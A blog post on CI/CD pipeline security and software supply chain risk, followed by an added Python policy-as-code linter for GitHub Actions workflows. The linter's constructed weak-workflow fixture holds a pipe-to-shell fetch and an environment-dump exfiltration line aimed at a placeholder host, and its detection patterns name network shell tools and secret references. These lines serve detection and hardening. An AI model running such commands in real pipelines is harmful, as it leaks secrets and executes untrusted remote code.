# Using Your Pipelines To Harden Your Pipelines: The Importance of CI/CD Security for Your Software Supply Chain

By [Idan Tendler](https://www.paloaltonetworks.com/blog/author/idan-tendler/?ts=markdown "Posts by Idan Tendler") | Dec 01, 2022 | 4 minutes

[Cloud Computing](https://www.paloaltonetworks.com/blog/category/cloud-computing-2/?ts=markdown) [DevSecOps](https://www.paloaltonetworks.com/blog/cloud-security/category/devsecops/?ts=markdown) [policy as code](https://www.paloaltonetworks.com/blog/tag/policy-as-code/?ts=markdown) [Software Supply Chain Security](https://www.paloaltonetworks.com/blog/tag/software-supply-chain-security/?ts=markdown)

As the systems we use to deliver software to the cloud get more complex and more reliant on third-party components, they also open more avenues for attack. Just last year, software supply chain attacks [jumped 51%](https://www.techrepublic.com/article/supply-chain-cyberattacks-jumped-51-in-2021/), evidence that bad (and creative) actors are capitalizing on these weaknesses. [Software supply chains](https://www.paloaltonetworks.com/cyberpedia/what-is-cloud-software-supply-chain-security) are only as strong as their weakest link, and Continuous Integration/Continuous Delivery (CI/CD) pipelines are an attack vector that [DevOps](https://www.paloaltonetworks.com/blog/prisma-cloud/a-primer-on-secure-devops-learn-the-benefits-of-these-3-devsecops-use-cases/) teams often leave under-protected. A single CI/CD misconfiguration can expose sensitive information and then serve as an entry point for injecting malicious code and leaking sensitive data. Ultimately, this can compromise the entire CI/CD pipeline and, with it, the software supply chain.

A recent [Unit 42 Cloud Threat Report](https://www.paloaltonetworks.com/prisma/unit42-cloud-threat-research-2h21) found that overly permissive credentials created opportunities for lateral movement and [CI/CD pipeline poisoning](https://www.paloaltonetworks.com/cyberpedia/poisoned-pipeline-execution-cicd-sec4). Additionally, it found that [63% of infrastructure as code (IaC) templates](https://www.cybersecuritydive.com/news/unit-42-cloud-misconfigurations-software-supply-chain-security/607290/) contain misconfigurations, and [91% of container images](https://www.cpomagazine.com/cyber-security/most-cloud-containers-deployed-on-public-registries-contain-vulnerabilities-and-misconfigurations-that-could-result-in-a-supply-chain-attack/) contain high or critical security vulnerabilities.
## **CI/CD and the Software Supply Chain**

[Cloud-native](https://www.paloaltonetworks.com/cyberpedia/what-is-cloud-native) software supply chains combine third-party software components, such as open source packages and [IaC](https://www.paloaltonetworks.com/blog/prisma-cloud/what-is-infrastructure-as-code-the-best-way-to-fully-control-your-cloud-configuration/) modules, with the underlying delivery pipelines required to store, manage and deliver software. Those delivery pipelines, such as Git repositories and [CI/CD pipelines](https://www.paloaltonetworks.com/cyberpedia/what-is-the-ci-cd-pipeline-and-ci-cd-security), are the lifeblood of agile teams. Deploying software multiple times a day is no longer a feat achieved only by the likes of Netflix and Google. The only way to stay competitive in today's market is to deliver performant, reliable and secure software quickly, and the best way to do that is with a well-oiled CI/CD pipeline.

CI/CD pipelines carry out a number of functions: they compile components, provision infrastructure and trigger tests to make sure that new code does not break existing features and that new features work correctly. With [DevSecOps practices](https://www.paloaltonetworks.com/blog/prisma-cloud/scaling-in-the-cloud/) in place, CI/CD pipelines also let security teams enforce security best practices before code is merged into the code base and one last time before deployment. While [shift-left security](https://www.paloaltonetworks.com/cyberpedia/shift-left-security) aims to empower developers to address security even earlier in the development lifecycle, CI/CD pipelines provide the centralized automation required to maintain infrastructure and application security best practices.
## **CI/CD Weaknesses and Software Supply Chain Risks**

As powerful as CI/CD pipelines are for ensuring the quality and security of applications before they are deployed, they require care in how they themselves are configured and in what user behavior is and is not allowed. Oversights here can give bad actors unmitigated access to mission-critical services and infrastructure, which they can use to leak sensitive data or inject malicious code or scripts.

**Related Article**: [CICD-SEC-1: Insufficient Flow Control Mechanisms Explained](https://www.paloaltonetworks.com/cyberpedia/insufficient-flow-control-mechanisms-cicd-sec1)

These are some common CI/CD weaknesses to watch out for:

* Allowing the use of deprecated commands or beta features
* Secrets exfiltration through unrestricted command execution in build steps
* Not preventing network calls from build steps (for example, fetching and executing a remote script), which can be used for code injection
* Allowing tests to run in privileged pods that can be hijacked for nefarious purposes
* Using arbitrary or vulnerable images to execute builds and tests, which opens them up to poisoning and attacks

## **Securing Pipelines With Pipelines**

We know that software delivery pipelines create opportunities for poisoning and [cyberattacks](https://www.paloaltonetworks.com/cyberpedia/what-is-a-cyber-attack). At the same time, CI/CD pipelines are crucial for delivering secure software components. So why not take the same approach you use to secure application and infrastructure code in pipelines and apply it to the pipelines themselves? Just as finding and fixing vulnerabilities and misconfigurations throughout the development process pays off, consistently identifying CI pipeline misconfigurations leads to an improved software supply chain security posture.
Because CI pipelines are configured in code, you can apply the same [policy-as-code](https://www.paloaltonetworks.com/cyberpedia/what-is-policy-as-code) approach you might use to [identify IaC misconfigurations](https://www.paloaltonetworks.com/prisma/cloud/infrastructure-as-code-security) or open source vulnerabilities to surface [CI/CD weaknesses](https://www.paloaltonetworks.com/cyberpedia/what-is-ci-cd-security). Flagging suspicious patterns in pipeline code at the moment a pull request is opened to change that code can prevent many of the weaknesses listed above. Automation coupled with human review can warn a developer when they attempt to add a deprecated command while writing their pipeline code, or alert a maintainer when a bad actor opens a pull request that adds a secret-exfiltration command to the pipeline. By shifting left, security and DevOps teams can work together to proactively harden pipelines using the tools and frameworks that already make up their CI/CD pipelines.

Interested in learning more best practices to secure your software supply chain? Download our [Software Supply Chain Security Checklist](https://www.paloaltonetworks.com/resources/datasheets/software-supply-chain-security-checklist).

This post originally appeared as a [Forbes Technology Council post](https://www.forbes.com/sites/forbestechcouncil/2022/08/23/using-your-pipelines-to-harden-your-pipelines-the-importance-of-cicd-security-for-your-software-supply-chain/?sh=58323861c36d).
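The following Python script is an added example of the policy-as-code check described above, run against the weaknesses listed in the previous section; it is not code from the original post or from Palo Alto Networks. It assumes a GitHub Actions workflow that has already been parsed from YAML into a dict (for example with PyYAML's `safe_load`) and embeds two constructed workflows: a weak one that trips every rule and a hardened counterpart. The rules flag the deprecated `::set-env` and `::add-path` workflow commands, `curl ... | bash`-style pipe-to-shell, network tools running in a step that has a secret or a full environment dump in reach, `--privileged` job containers, and, going one step beyond the list, container images and third-party actions that are not pinned to a digest or full commit SHA. The digest and commit SHA in the hardened sample are placeholder values.

```python
"""Policy-as-code checks for a parsed GitHub Actions workflow (added example, not Palo Alto Networks code).
Assumes the workflow dict came from a YAML loader such as yaml.safe_load; the two samples at
the bottom are constructed for this example and use placeholder digest / SHA values."""
import re
from dataclasses import dataclass

# Workflow commands GitHub Actions deprecated in favour of writing to $GITHUB_ENV / $GITHUB_PATH.
DEPRECATED_CMDS = ("::set-env", "::add-path")
NET_TOOL = re.compile(r"\b(curl|wget|nc|ncat|socat)\b")
# "curl ... | bash", "wget -O- ... | sudo sh": remote content executed without inspection.
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(sudo\s+)?(ba|z|da)?sh\b")
SECRET_REF = re.compile(r"\$\{\{\s*secrets\.")
# "env | ...", "printenv > ...": the whole environment dumped and fed somewhere else.
ENV_DUMP = re.compile(r"(?m)(?:^|[;&|]\s*)(printenv|env)\s*(?:$|[|>;&])")
FULL_SHA = re.compile(r"@[0-9a-f]{40}$")
IMAGE_DIGEST = re.compile(r"@sha256:[0-9a-f]{64}$")


@dataclass(frozen=True)
class Finding:
    job: str
    step: int      # index into the job's steps, or -1 for a job-level finding
    rule: str
    detail: str


def _container_findings(job, cfg):
    """Checks for a `container:` or `services:` entry (string or mapping form)."""
    cfg = {"image": cfg} if isinstance(cfg, str) else cfg
    out = []
    image = cfg.get("image", "")
    if image and not IMAGE_DIGEST.search(image):
        out.append(Finding(job, -1, "unpinned-image", f"image {image!r} is not pinned by sha256 digest"))
    if "--privileged" in str(cfg.get("options", "")):
        out.append(Finding(job, -1, "privileged-container", "job container runs with --privileged"))
    return out


def _run_findings(job, idx, script, secret_in_scope):
    """Checks for one `run:` script; secret_in_scope is True if a secret is exposed to it."""
    out = []
    for cmd in DEPRECATED_CMDS:
        if cmd in script:
            out.append(Finding(job, idx, "deprecated-command", f"uses deprecated {cmd}"))
    if PIPE_TO_SHELL.search(script):
        out.append(Finding(job, idx, "pipe-to-shell", "remote content piped straight into a shell"))
    if NET_TOOL.search(script) and (secret_in_scope or ENV_DUMP.search(script)):
        out.append(Finding(job, idx, "possible-secret-exfil",
                           "network tool runs with a secret or the whole environment in reach"))
    return out


def lint_workflow(workflow):
    """Return every Finding for a parsed workflow; an empty list means no rule fired."""
    findings = []
    for job, spec in (workflow.get("jobs") or {}).items():
        job_env = spec.get("env") or {}
        if "container" in spec:
            findings += _container_findings(job, spec["container"])
        for svc in (spec.get("services") or {}).values():
            findings += _container_findings(job, svc)
        for idx, step in enumerate(spec.get("steps") or []):
            uses = step.get("uses", "")
            if uses and not uses.startswith("./"):   # local actions live in the same repo
                pin = IMAGE_DIGEST if uses.startswith("docker://") else FULL_SHA
                if not pin.search(uses):
                    findings.append(Finding(job, idx, "unpinned-action",
                                            f"{uses!r} is not pinned to a commit SHA or digest"))
            script = step.get("run")
            if script:
                env_vals = " ".join(map(str, {**job_env, **(step.get("env") or {})}.values()))
                in_scope = bool(SECRET_REF.search(script) or SECRET_REF.search(env_vals))
                findings += _run_findings(job, idx, script, in_scope)
    return findings


# Constructed sample: the kind of pipeline change that should be flagged on the pull request.
WEAK = {"jobs": {"test": {
    "runs-on": "ubuntu-latest",
    "container": {"image": "node:latest", "options": "--privileged"},
    "env": {"NPM_TOKEN": "${{ secrets.NPM_TOKEN }}"},
    "steps": [
        {"uses": "actions/checkout@v3"},
        {"run": "curl -sSL https://example.invalid/setup.sh | bash"},
        {"run": 'echo "::set-env name=CI_STAGE::test"'},
        {"run": "npm test && env | curl -X POST --data-binary @- https://example.invalid/collect"},
    ]}}}

# Constructed hardened counterpart: digest-pinned image and SHA-pinned action (placeholder values),
# $GITHUB_ENV instead of ::set-env, and the secret scoped to the single step that needs it.
HARDENED = {"jobs": {"test": {
    "runs-on": "ubuntu-latest",
    "container": {"image": "node@sha256:" + "0" * 64},
    "steps": [
        {"uses": "actions/checkout@" + "a" * 40},
        {"run": "npm ci && npm test"},
        {"run": 'echo "CI_STAGE=test" >> "$GITHUB_ENV"'},
        {"env": {"NPM_TOKEN": "${{ secrets.NPM_TOKEN }}"}, "run": "npm publish"},
    ]}}}

if __name__ == "__main__":
    for f in lint_workflow(WEAK):
        print(f"{f.job}[{f.step}] {f.rule}: {f.detail}")
    print("hardened:", lint_workflow(HARDENED))
```

Findings are meant to be surfaced on the pull request that changes the workflow, for a human to judge: a `curl` with a secret in scope is normal in a deploy step, so the check flags for review rather than blocking outright. Note that the job-level secret in the weak sample is reachable by the `curl | bash` step as well, which is why that step is reported twice; scoping the secret to the one step that needs it, as the hardened sample does, removes that exposure.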